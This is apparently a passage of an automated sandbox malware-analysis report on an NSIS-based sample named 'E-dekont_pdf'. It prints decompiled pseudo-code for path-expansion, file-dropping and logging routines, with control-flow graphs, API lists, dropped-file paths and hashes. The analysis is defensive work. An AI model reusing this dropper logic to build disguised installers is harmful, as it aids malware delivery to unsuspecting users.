                                                                                              control_flow_graph 447 4066a5-4066b0 448 4066b2-4066c1 447->448 449 4066c3-4066d9 447->449 448->449 450 4066f1-4066fa 449->450 451 4066db-4066e8 449->451 453 406700 450->453 454 4068d5-4068e0 450->454 451->450 452 4066ea-4066ed 451->452 452->450 455 406705-406712 453->455 456 4068e2-4068e6 call 406668 454->456 457 4068eb-4068ec 454->457 455->454 458 406718-406721 455->458 456->457 460 4068b3 458->460 461 406727-406764 458->461 462 4068c1-4068c4 460->462 463 4068b5-4068bf 460->463 464 406857-40685c 461->464 465 40676a-406771 461->465 466 4068c6-4068cf 462->466 463->466 467 40685e-406864 464->467 468 40688f-406894 464->468 469 406773-406775 465->469 470 406776-406778 465->470 466->454 475 406702 466->475 476 406874-406880 call 406668 467->476 477 406866-406872 call 4065af 467->477 473 4068a3-4068b1 lstrlenW 468->473 474 406896-40689e call 4066a5 468->474 469->470 471 4067b5-4067b8 470->471 472 40677a-4067a1 call 406536 470->472 480 4067c8-4067cb 471->480 481 4067ba-4067c6 GetSystemDirectoryW 471->481 492 4067a7-4067b0 call 4066a5 472->492 493 40683e-406842 472->493 473->466 474->473 475->455 484 406885-40688b 476->484 477->484 487 406834-406836 480->487 488 4067cd-4067db GetWindowsDirectoryW 480->488 486 406838-40683c 481->486 484->473 490 40688d 484->490 486->493 494 40684f-406855 call 4068ef 486->494 487->486 491 4067dd-4067e5 487->491 488->487 490->494 498 4067e7-4067f0 491->498 499 4067fc-406812 SHGetSpecialFolderLocation 491->499 492->486 493->494 496 406844-40684a lstrcatW 493->496 494->473 496->494 504 4067f8-4067fa 498->504 500 406830 499->500 501 406814-40682e SHGetPathFromIDListW CoTaskMemFree 499->501 500->487 501->486 501->500 504->486 504->499
                                                                                              C-Code - Quality: 72%
                                                                                              			E004066A5(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
				struct _ITEMIDLIST* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t44;
				WCHAR* _t45;
				signed char _t47;
				signed int _t48;
				short _t59;
				short _t61;
				short _t63;
				void* _t71;
				signed int _t77;
				signed int _t78;
				short _t81;
				short _t82;
				signed char _t84;
				signed int _t85;
				void* _t98;
				void* _t104;
				intOrPtr* _t105;
				void* _t107;
				WCHAR* _t108;
				void* _t110;

				_t107 = __esi;
				_t104 = __edi;
				_t71 = __ebx;
				_t44 = _a8;
				if(_t44 < 0) {
					_t44 =  *( *0x46823c - 4 + _t44 * 4);
				}
				_push(_t71);
				_push(_t107);
				_push(_t104);
				_t105 =  *0x470298 + _t44 * 2;
				_t45 = 0x460200;
				_t108 = 0x460200;
				if(_a4 >= 0x460200 && _a4 - 0x460200 >> 1 < 0x4000) {
					_t108 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				_t81 =  *_t105;
				_a8 = _t81;
				if(_t81 == 0) {
					L43:
					 *_t108 =  *_t108 & 0x00000000;
					if(_a4 == 0) {
						return _t45;
					}
					return E00406668(_a4, _t45);
				} else {
					while((_t108 - _t45 & 0xfffffffe) < 0x4000) {
						_t98 = 2;
						_t105 = _t105 + _t98;
						if(_t81 >= 4) {
							if(__eflags != 0) {
								 *_t108 = _t81;
								_t108 = _t108 + _t98;
								__eflags = _t108;
							} else {
								 *_t108 =  *_t105;
								_t108 = _t108 + _t98;
								_t105 = _t105 + _t98;
							}
							L42:
							_t82 =  *_t105;
							_a8 = _t82;
							if(_t82 != 0) {
								_t81 = _a8;
								continue;
							}
							goto L43;
						}
						_t84 =  *((intOrPtr*)(_t105 + 1));
						_t47 =  *_t105;
						_t48 = _t47 & 0x000000ff;
						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
						_t85 = _t84 & 0x000000ff;
						_v28 = _t48 | 0x00008000;
						_t77 = 2;
						_v16 = _t85;
						_t105 = _t105 + _t77;
						_v24 = _t48;
						_v20 = _t85 | 0x00008000;
						if(_a8 != _t77) {
							__eflags = _a8 - 3;
							if(_a8 != 3) {
								__eflags = _a8 - 1;
								if(__eflags == 0) {
									__eflags = (_t48 | 0xffffffff) - _v12;
									E004066A5(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
								}
								L38:
								_t108 =  &(_t108[lstrlenW(_t108)]);
								_t45 = 0x460200;
								goto L42;
							}
							_t78 = _v12;
							__eflags = _t78 - 0x1d;
							if(_t78 != 0x1d) {
								__eflags = (_t78 << 0xe) + 0x471000;
								E00406668(_t108, (_t78 << 0xe) + 0x471000);
							} else {
								E004065AF(_t108,  *0x470268);
							}
							__eflags = _t78 + 0xffffffeb - 7;
							if(__eflags < 0) {
								L29:
								E004068EF(_t108);
							}
							goto L38;
						}
						if( *0x4702e4 != 0) {
							_t77 = 4;
						}
						_t121 = _t48;
						if(_t48 >= 0) {
							__eflags = _t48 - 0x25;
							if(_t48 != 0x25) {
								__eflags = _t48 - 0x24;
								if(_t48 == 0x24) {
									GetWindowsDirectoryW(_t108, 0x2000);
									_t77 = 0;
								}
								while(1) {
									__eflags = _t77;
									if(_t77 == 0) {
										goto L26;
									}
									_t59 =  *0x470264;
									_t77 = _t77 - 1;
									__eflags = _t59;
									if(_t59 == 0) {
										L22:
										_t61 = SHGetSpecialFolderLocation( *0x470268,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
										__eflags = _t61;
										if(_t61 != 0) {
											L24:
											 *_t108 =  *_t108 & 0x00000000;
											__eflags =  *_t108;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v8, _t108);
										_a8 = _t61;
										__imp__CoTaskMemFree(_v8);
										__eflags = _a8;
										if(_a8 != 0) {
											goto L26;
										}
										goto L24;
									}
									_t63 =  *_t59( *0x470268,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108); // executed
									__eflags = _t63;
									if(_t63 == 0) {
										goto L26;
									}
									goto L22;
								}
								goto L26;
							}
							GetSystemDirectoryW(_t108, 0x2000);
							goto L26;
						} else {
							E00406536( *0x470298, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x470298 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
							if( *_t108 != 0) {
								L27:
								if(_v16 == 0x1a) {
									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L29;
							}
							E004066A5(_t77, _t105, _t108, _t108, _v16);
							L26:
							if( *_t108 == 0) {
								goto L29;
							}
							goto L27;
						}
					}
					goto L43;
				}
			}





























                                                                                              0x004066a5
                                                                                              0x004066a5
                                                                                              0x004066a5
                                                                                              0x004066ab
                                                                                              0x004066b0
                                                                                              0x004066c1
                                                                                              0x004066c1
                                                                                              0x004066c9
                                                                                              0x004066ca
                                                                                              0x004066cb
                                                                                              0x004066cc
                                                                                              0x004066cf
                                                                                              0x004066d7
                                                                                              0x004066d9
                                                                                              0x004066ea
                                                                                              0x004066ed
                                                                                              0x004066ed
                                                                                              0x004066f1
                                                                                              0x004066f7
                                                                                              0x004066fa
                                                                                              0x004068d5
                                                                                              0x004068d5
                                                                                              0x004068e0
                                                                                              0x004068ec
                                                                                              0x004068ec
                                                                                              0x00000000
                                                                                              0x00406700
                                                                                              0x00406705
                                                                                              0x0040671a
                                                                                              0x0040671b
                                                                                              0x00406721
                                                                                              0x004068b3
                                                                                              0x004068c1
                                                                                              0x004068c4
                                                                                              0x004068c4
                                                                                              0x004068b5
                                                                                              0x004068b8
                                                                                              0x004068bb
                                                                                              0x004068bd
                                                                                              0x004068bd
                                                                                              0x004068c6
                                                                                              0x004068c6
                                                                                              0x004068cc
                                                                                              0x004068cf
                                                                                              0x00406702
                                                                                              0x00000000
                                                                                              0x00406702
                                                                                              0x00000000
                                                                                              0x004068cf
                                                                                              0x00406727
                                                                                              0x0040672a
                                                                                              0x00406739
                                                                                              0x00406740
                                                                                              0x0040674c
                                                                                              0x0040674f
                                                                                              0x00406752
                                                                                              0x00406753
                                                                                              0x00406758
                                                                                              0x0040675e
                                                                                              0x00406761
                                                                                              0x00406764
                                                                                              0x00406857
                                                                                              0x0040685c
                                                                                              0x0040688f
                                                                                              0x00406894
                                                                                              0x00406899
                                                                                              0x0040689e
                                                                                              0x0040689e
                                                                                              0x004068a3
                                                                                              0x004068a9
                                                                                              0x004068ac
                                                                                              0x00000000
                                                                                              0x004068ac
                                                                                              0x0040685e
                                                                                              0x00406861
                                                                                              0x00406864
                                                                                              0x00406879
                                                                                              0x00406880
                                                                                              0x00406866
                                                                                              0x0040686d
                                                                                              0x0040686d
                                                                                              0x00406888
                                                                                              0x0040688b
                                                                                              0x0040684f
                                                                                              0x00406850
                                                                                              0x00406850
                                                                                              0x00000000
                                                                                              0x0040688b
                                                                                              0x00406771
                                                                                              0x00406775
                                                                                              0x00406775
                                                                                              0x00406776
                                                                                              0x00406778
                                                                                              0x004067b5
                                                                                              0x004067b8
                                                                                              0x004067c8
                                                                                              0x004067cb
                                                                                              0x004067d3
                                                                                              0x004067d9
                                                                                              0x004067d9
                                                                                              0x00406834
                                                                                              0x00406834
                                                                                              0x00406836
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004067dd
                                                                                              0x004067e2
                                                                                              0x004067e3
                                                                                              0x004067e5
                                                                                              0x004067fc
                                                                                              0x0040680a
                                                                                              0x00406810
                                                                                              0x00406812
                                                                                              0x00406830
                                                                                              0x00406830
                                                                                              0x00406830
                                                                                              0x00000000
                                                                                              0x00406830
                                                                                              0x00406818
                                                                                              0x00406821
                                                                                              0x00406824
                                                                                              0x0040682a
                                                                                              0x0040682e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040682e
                                                                                              0x004067f6
                                                                                              0x004067f8
                                                                                              0x004067fa
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004067fa
                                                                                              0x00000000
                                                                                              0x00406834
                                                                                              0x004067c0
                                                                                              0x00000000
                                                                                              0x0040677a
                                                                                              0x00406798
                                                                                              0x004067a1
                                                                                              0x0040683e
                                                                                              0x00406842
                                                                                              0x0040684a
                                                                                              0x0040684a
                                                                                              0x00000000
                                                                                              0x00406842
                                                                                              0x004067ab
                                                                                              0x00406838
                                                                                              0x0040683c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040683c
                                                                                              0x00406778
                                                                                              0x00000000
                                                                                              0x00406705

                                                                                              APIs
                                                                                              • GetSystemDirectoryW.KERNEL32(Call,00002000), ref: 004067C0
                                                                                              • GetWindowsDirectoryW.KERNEL32(Call,00002000,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsdECC9.tmp\System.dll,?,00405701,Skipped: C:\Users\user\AppData\Local\Temp\nsdECC9.tmp\System.dll,00000000,00000000,00000000,00000000), ref: 004067D3
                                                                                              • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                                              • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsdECC9.tmp\System.dll,?,00405701,Skipped: C:\Users\user\AppData\Local\Temp\nsdECC9.tmp\System.dll,00000000), ref: 004068A4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: Directory$SystemWindowslstrcatlstrlen
                                                                                              • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsdECC9.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                              • API String ID: 4260037668-653713894
                                                                                              • Opcode ID: 0f5a8af760075a28b239619660895707e83ab57078bead619950fa75d628ea59
                                                                                              • Instruction ID: 8e3ecdcd1f33a8191bdbbf481d2aa87b9147467fb839849d6121fd5a880d6789
                                                                                              • Opcode Fuzzy Hash: 0f5a8af760075a28b239619660895707e83ab57078bead619950fa75d628ea59
                                                                                              • Instruction Fuzzy Hash: A161E272902215EADB10AF64DC54BAA37A5EF10314F22C13FE907B62D0EB7D49A1CB4D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145stringtimeCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 795 40176f-401794 call 402da6 call 405fae 800 401796-40179c call 406668 795->800 801 40179e-4017b0 call 406668 call 405f37 lstrcatW 795->801 806 4017b5-4017b6 call 4068ef 800->806 801->806 810 4017bb-4017bf 806->810 811 4017c1-4017cb call 40699e 810->811 812 4017f2-4017f5 810->812 819 4017dd-4017ef 811->819 820 4017cd-4017db CompareFileTime 811->820 814 4017f7-4017f8 call 406133 812->814 815 4017fd-401819 call 406158 812->815 814->815 822 40181b-40181e 815->822 823 40188d-4018b6 call 4056ca call 403371 815->823 819->812 820->819 825 401820-40185e call 406668 * 2 call 4066a5 call 406668 call 405cc8 822->825 826 40186f-401879 call 4056ca 822->826 836 4018b8-4018bc 823->836 837 4018be-4018ca SetFileTime 823->837 825->810 857 401864-401865 825->857 838 401882-401888 826->838 836->837 840 4018d0-4018db CloseHandle 836->840 837->840 841 402c33 838->841 843 4018e1-4018e4 840->843 844 402c2a-402c2d 840->844 845 402c35-402c39 841->845 847 4018e6-4018f7 call 4066a5 lstrcatW 843->847 848 4018f9-4018fc call 4066a5 843->848 844->841 854 401901-402398 847->854 848->854 858 40239d-4023a2 854->858 859 402398 call 405cc8 854->859 857->838 860 401867-401868 857->860 858->845 859->858 860->826
                                                                                              C-Code - Quality: 77%
                                                                                              			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __esi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				WCHAR* _t81;
				void* _t83;
				void* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402DA6(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
				_t35 = E00405FAE( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t81 = L"Call";
				if(_t35 == 0) {
					lstrcatW(E00405F37(E00406668(_t81, L"C:\\Users\\Arthur\\AppData\\Roaming\\Uundvrligheden\\Rendejerns")), ??);
				} else {
					E00406668();
				}
				E004068EF(_t81);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E0040699E(_t81);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x24);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00406133(_t81);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E00406158(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x38) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E004056CA(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x4702e8 =  *0x4702e8 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x4702e8;
						goto L32;
					} else {
						E00406668(0x4125f8, _t83);
						E00406668(_t83, _t81);
						E004066A5(_t77, _t81, _t83, "C:\Users\Arthur\AppData\Local\Temp\nsdECC9.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x1c)));
						E00406668(_t83, 0x4125f8);
						_t64 = E00405CC8("C:\Users\Arthur\AppData\Local\Temp\nsdECC9.tmp\System.dll",  *(_t86 - 0x30) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x4702e8 =  &( *0x4702e8->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t81);
								_push(0xfffffffa);
								E004056CA();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E004056CA(0xffffffea,  *(_t86 - 8)); // executed
				 *0x470314 =  *0x470314 + 1;
				_t45 = E00403371(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
				 *0x470314 =  *0x470314 - 1;
				__eflags =  *(_t86 - 0x24) - 0xffffffff;
				_t84 = _t45;
				if( *(_t86 - 0x24) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t86 - 0x38)); // executed
				__eflags = _t84 - _t77;
				if(_t84 >= _t77) {
					goto L31;
				} else {
					__eflags = _t84 - 0xfffffffe;
					if(_t84 != 0xfffffffe) {
						E004066A5(_t77, _t81, _t84, _t81, 0xffffffee);
					} else {
						E004066A5(_t77, _t81, _t84, _t81, 0xffffffe9);
						lstrcatW(_t81,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t81);
					E00405CC8();
					goto L29;
				}
				goto L33;
			}


















                                                                                              0x0040176f
                                                                                              0x00401776
                                                                                              0x00401782
                                                                                              0x00401785
                                                                                              0x0040178a
                                                                                              0x0040178d
                                                                                              0x00401794
                                                                                              0x004017b0
                                                                                              0x00401796
                                                                                              0x00401797
                                                                                              0x00401797
                                                                                              0x004017b6
                                                                                              0x004017bb
                                                                                              0x004017bb
                                                                                              0x004017bf
                                                                                              0x004017c2
                                                                                              0x004017c7
                                                                                              0x004017c9
                                                                                              0x004017cb
                                                                                              0x004017d0
                                                                                              0x004017d0
                                                                                              0x004017db
                                                                                              0x004017db
                                                                                              0x004017ec
                                                                                              0x004017ee
                                                                                              0x004017ee
                                                                                              0x004017ef
                                                                                              0x004017ef
                                                                                              0x004017f2
                                                                                              0x004017f5
                                                                                              0x004017f8
                                                                                              0x004017f8
                                                                                              0x004017ff
                                                                                              0x0040180e
                                                                                              0x00401813
                                                                                              0x00401816
                                                                                              0x00401819
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040181b
                                                                                              0x0040181e
                                                                                              0x00401874
                                                                                              0x00401879
                                                                                              0x004015b6
                                                                                              0x0040292e
                                                                                              0x0040292e
                                                                                              0x00402c2a
                                                                                              0x00402c2d
                                                                                              0x00402c2d
                                                                                              0x00000000
                                                                                              0x00401820
                                                                                              0x00401826
                                                                                              0x0040182d
                                                                                              0x0040183a
                                                                                              0x00401845
                                                                                              0x0040185b
                                                                                              0x0040185b
                                                                                              0x0040185e
                                                                                              0x00000000
                                                                                              0x00401864
                                                                                              0x00401864
                                                                                              0x00401865
                                                                                              0x00401882
                                                                                              0x00402c33
                                                                                              0x00402c33
                                                                                              0x00402c33
                                                                                              0x00401867
                                                                                              0x00401867
                                                                                              0x00401868
                                                                                              0x00401493
                                                                                              0x0040239d
                                                                                              0x0040239d
                                                                                              0x0040239d
                                                                                              0x00401865
                                                                                              0x0040185e
                                                                                              0x00402c35
                                                                                              0x00402c39
                                                                                              0x00402c39
                                                                                              0x00401892
                                                                                              0x00401897
                                                                                              0x004018a5
                                                                                              0x004018aa
                                                                                              0x004018b0
                                                                                              0x004018b4
                                                                                              0x004018b6
                                                                                              0x004018be
                                                                                              0x004018ca
                                                                                              0x004018b8
                                                                                              0x004018b8
                                                                                              0x004018bc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004018bc
                                                                                              0x004018d3
                                                                                              0x004018d9
                                                                                              0x004018db
                                                                                              0x00000000
                                                                                              0x004018e1
                                                                                              0x004018e1
                                                                                              0x004018e4
                                                                                              0x004018fc
                                                                                              0x004018e6
                                                                                              0x004018e9
                                                                                              0x004018f2
                                                                                              0x004018f2
                                                                                              0x00401901
                                                                                              0x00401906
                                                                                              0x00402398
                                                                                              0x00000000
                                                                                              0x00402398
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                                              • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Uundvrligheden\Rendejerns,?,?,00000031), ref: 004017D5
                                                                                                • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00002000,004037B0,00468260,NSIS Error), ref: 00406675
                                                                                                • Part of subcall function 004056CA: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsdECC9.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                                • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,Skipped: C:\Users\user\AppData\Local\Temp\nsdECC9.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                                • Part of subcall function 004056CA: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsdECC9.tmp\System.dll,004030A8), ref: 00405725
                                                                                                • Part of subcall function 004056CA: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsdECC9.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsdECC9.tmp\System.dll), ref: 00405737
                                                                                                • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                                • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                                • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsdECC9.tmp\System.dll$C:\Users\user\AppData\Roaming\Uundvrligheden\Rendejerns$Call
                                                                                              • API String ID: 1941528284-3721715009
                                                                                              • Opcode ID: 0247a373a3af7b4a30748b7293cd447e2481cb374c54c5f24602378df4b37054
                                                                                              • Instruction ID: 06bee6ff3ccd5f5b501047e13325295af2c3c71c73bd90c8d8b76e0e1c152b43
                                                                                              • Opcode Fuzzy Hash: 0247a373a3af7b4a30748b7293cd447e2481cb374c54c5f24602378df4b37054
                                                                                              • Instruction Fuzzy Hash: CD41B771400209BADF10BBB5CD85DAE3A79EF45318B20473FF422B20E1DA3D8951DA2D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004056CA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 861 4056ca-4056df 862 4056e5-4056f6 861->862 863 405796-40579a 861->863 864 405701-40570d lstrlenW 862->864 865 4056f8-4056fc call 4066a5 862->865 867 40572a-40572e 864->867 868 40570f-40571f lstrlenW 864->868 865->864 870 405730-405737 SetWindowTextW 867->870 871 40573d-405741 867->871 868->863 869 405721-405725 lstrcatW 868->869 869->867 870->871 872 405743-405785 SendMessageW * 3 871->872 873 405787-405789 871->873 872->873 873->863 874 40578b-40578e 873->874 874->863
                                                                                              C-Code - Quality: 100%
                                                                                              			E004056CA(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x468244;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x470314;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E004066A5(_t38, 0, 0x43e728, 0x43e728, _a4);
					}
					_t27 = lstrlenW(0x43e728);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x468228, 0x43e728); // executed
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x43e728;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x43e728[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x8000) {
							_t27 = lstrcatW(0x43e728, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

















                                                                                              0x004056d0
                                                                                              0x004056da
                                                                                              0x004056df
                                                                                              0x004056e5
                                                                                              0x004056f0
                                                                                              0x004056f3
                                                                                              0x004056f6
                                                                                              0x004056fc
                                                                                              0x004056fc
                                                                                              0x00405702
                                                                                              0x0040570a
                                                                                              0x0040570d
                                                                                              0x0040572a
                                                                                              0x0040572e
                                                                                              0x00405737
                                                                                              0x00405737
                                                                                              0x00405741
                                                                                              0x0040574a
                                                                                              0x00405756
                                                                                              0x0040575d
                                                                                              0x00405761
                                                                                              0x00405764
                                                                                              0x00405777
                                                                                              0x00405785
                                                                                              0x00405785
                                                                                              0x00405789
                                                                                              0x0040578b
                                                                                              0x0040578e
                                                                                              0x00000000
                                                                                              0x0040578e
                                                                                              0x0040570f
                                                                                              0x00405717
                                                                                              0x0040571f
                                                                                              0x00405725
                                                                                              0x00000000
                                                                                              0x00405725
                                                                                              0x0040571f
                                                                                              0x0040570d
                                                                                              0x0040579a

                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsdECC9.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                              • lstrlenW.KERNEL32(004030A8,Skipped: C:\Users\user\AppData\Local\Temp\nsdECC9.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
